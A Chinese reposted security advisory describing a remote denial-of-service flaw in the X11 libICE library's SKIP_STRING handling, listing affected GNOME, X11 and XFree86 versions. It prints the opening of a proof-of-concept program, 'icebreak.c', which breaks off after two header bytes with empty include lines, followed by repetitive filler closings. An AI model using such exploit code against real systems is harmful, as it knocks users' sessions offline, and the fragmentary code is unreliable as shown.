此文章主要讲述的是libICE 库拒绝服务攻击漏洞,如果你对libICE 库拒绝服务攻击漏洞有兴趣的话,你就可以对以下的文章点击观看了,以下就是具体内容的描述,希望在你今后的学习中会有所帮助。
受影响系统:
GNOME Gnome 1.1
GNOME GNOME 1.0.x
Open Group X 11.0R6.x
Open Group X 11.0R6
Open Group X 11.0R5
XFree86 X11R6 4.0
XFree86 X11R6 3.3.6
- RedHat Linux 6.2 i386
XFree86 X11R6 3.3.5
- RedHat Linux 6.1 i386
XFree86 X11R6 3.3.4
XFree86 X11R6 3.3.3
不受影响系统:
GNOME Gnome 1.2
描述:
libICE是X11 window系统的一部分。由于在处理SKIP_STRING宏的时候存在一些问题,导致
任何使用libICE创建监听socket的应用程序都可以被远程攻击,使之停止服务。攻击者可以
给skip提供一个很大的值,使指针指向某些未初始化的内存区域,从而发生段访问错误。
GNOME中大量的使用了libICE,因此攻击者可能对正在运行GNOME的用户的X会话发动攻击。
<* 来源:Chris Evans *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* icebreak.c - Chris Evans */
#include
#include
#include
int
main(int argc, const char* argv[])
{
unsigned char c;
unsigned int i;
unsigned short s;
char blankbuf[1000];
memset(blankbuf, '\0', sizeof(blankbuf));
/* Assume fd 1 is stdout */
/* ICE connection header */
/* First, pick an endian-ness */
/* Byte 1: Major opcode. Must be 0 */
c = 0;
write(1, &c, 1);
/* Byte 2: Minor opcode. Must be ICE_ByteOrder (1) */
以上的相关内容就是对libICE 库拒绝服务攻击漏洞的介绍,望你能有所收获。
上述的相关内容就是对libICE 库拒绝服务攻击漏洞的描述,希望会给你带来一些帮助在此方面。
【编辑推荐】
